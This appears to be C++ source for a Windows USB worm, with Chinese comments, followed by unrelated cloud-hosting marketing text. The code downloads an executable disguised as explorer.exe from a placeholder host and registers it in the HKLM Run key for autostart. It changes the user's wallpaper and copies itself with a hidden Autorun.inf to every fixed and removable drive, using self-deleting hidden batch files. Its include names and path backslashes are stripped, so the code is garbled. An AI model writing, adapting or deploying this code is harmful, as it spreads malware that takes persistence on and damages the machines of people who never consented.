#include "stdafx.h"
#include
#include
#include
#include
#include
#include //這個標頭檔裡有ShellExecute的定義
#include
#include
#include
#include
#include
#pragma comment (lib,"Urlmon.lib")
//函數
void down();
bool Checkdisk();
void Scandisk();
void destory();
void reg();
int getname();
void drive();
using namespace std;
#define FILENAME "C:Autorun.inf"
int getname()//擷取目前使用者名 並修改牆紙 需要重起見效
{
char szName[1024];
unsigned long lens = sizeof(szName);
GetUserName(szName, &lens );
static char subkey1[] = "Control PanelDesktop";
static char vname1[] = "ConvertedWallpaper";
static char exefile1[] = "C:progra~1Messengerjl.bmp";
ULONG dType = REG_SZ, len = 0;
HKEY hKey;
RegOpenKeyEx(HKEY_CURRENT_USER,subkey1,0,KEY_SET_VALUE|KEY_QUERY_VALUE,&hKey);//開啟。
RegSetValueEx(hKey, vname1, 0, REG_SZ,(BYTE *)exefile1, strlen(exefile1)+1); //加上。
RegCloseKey(hKey); //關閉。
FILE *f;//複製一份圖片
f=fopen("change.bat","w=");
fprintf(f,"copy C:progra~1Messengerjl.bmp C:docume~1%sLocalS~1Applic~1MicrosoftWallpaper1.bmp",szName);
//注意使用短檔案名稱
fprintf(f,"n");
fprintf(f,"del change.bat");//自刪除
fclose(f);
WinExec("change.bat",SW_HIDE);
return 0;
}
void reg()//利用註冊表進行自啟動
{
static char subkey[] = "SoftwareMicrosoftWindowsCurrentVersionRun";
static char vname[] = "explorer.exe";
static char exefile[] = "C:progra~1Messengerexplorer.exe";
ULONG dType = REG_SZ, len = 0;
HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,subkey,0,KEY_SET_VALUE|KEY_QUERY_VALUE,&hKey);//開啟。
if (RegQueryValueEx(hKey, vname, 0, &dType, NULL, &len)) { //如果沒有explorer,
RegSetValueEx(hKey, vname, 0, REG_SZ,(BYTE *)exefile, strlen(exefile)+1); //就加上。
}
RegCloseKey(hKey); //關閉。
}
void down()//下載
{
//website為存放檔案的網址
URLDownloadToFile(NULL,"http://website/jl.bmp","C:progra~1Messengerjl.bmp",0,NULL);//下經過系統處理的圖片
URLDownloadToFile(NULL,"http://website/explorer.exe","C:progra~1Messengerexplorer.exe",0,NULL);//下載本檔案
URLDownloadToFile(NULL,"http://website/Autorun.inf","C:progra~1MessengerAutorun.inf",0,NULL);//下檔案
ShellExecute(0,"open","C:progra~1Messengerjl.bmp",NULL,NULL,SW_SHOW);//運行檔案
}
void destory()
{
int i=1;
while(i<=100)
{
ShellExecute(0,"open","C:progra~1Messengerjl.bmp",NULL,NULL,SW_SHOW);//運行檔案
Sleep(13000);
}
}
void drive()//複製到各個盤
{
char drive[4]={0};
wsprintf(drive,"C:");
drive[0]='C';
while(drive[0]<='Z')
{
if(GetDriveType(drive)==DRIVE_FIXED)
{
FILE *f;
f=fopen("drive.bat","w=");
fprintf(f,"copy C:progra~1Messengerexplorer.exe %c:explorer.exe",drive[0]);
fprintf(f,"n");
fprintf(f,"copy C:progra~1MessengerAutorun.inf %c:Autorun.inf",drive[0]);
fprintf(f,"n");
fprintf(f,"attrib +h %c:Autorun.inf",drive[0]);
fprintf(f,"n");
fprintf(f,"attrib +h %c:explorer.exe",drive[0]);
fprintf(f,"n");
fprintf(f,"del drive.bat");
fclose(f);
WinExec("drive.bat",SW_HIDE);
Sleep(500);
//return true;
}
drive[0]++;
}
}
bool Checkdisk()//掃描是否有移動盤
{
char usb[4]={0};
wsprintf(usb,"C:");//很重要
usb[0]='C';
while(usb[0]<='Z')
{
if(GetDriveType(usb)==DRIVE_REMOVABLE)
{
FILE *f;
f=fopen("usb1.bat","w=");
fprintf(f,"copy C:progra~1Messengerexplorer.exe %c:explorer.exe",usb[0]);
fprintf(f,"n");
fprintf(f,"copy C:progra~1MessengerAutorun.inf %c:Autorun.inf",usb[0]);
fprintf(f,"n");
fprintf(f,"attrib +h %c:Autorun.inf",usb[0]);
fprintf(f,"n");
fprintf(f,"attrib +h %c:explorer.exe",usb[0]);
fprintf(f,"n");
fprintf(f,"del usb1.bat");
fclose(f);
WinExec("usb1.bat",SW_HIDE);
return true;
}
usb[0]++;
}
// }
return false;
}
void Scandisk()//定時檢測是否有移動盤
{
while(!Checkdisk())
{
Sleep(4000);//掃描後停止4秒
}
}
void EntryPoint()
{
ExitProcess(WinMain(GetModuleHandle(NULL), NULL, GetCommandLine(), SW_HIDE));
}
//主函數
int WINAPI WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
down();
getname();
reg();
drive();
Checkdisk();
Scandisk();
destory();
return 0;
}
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
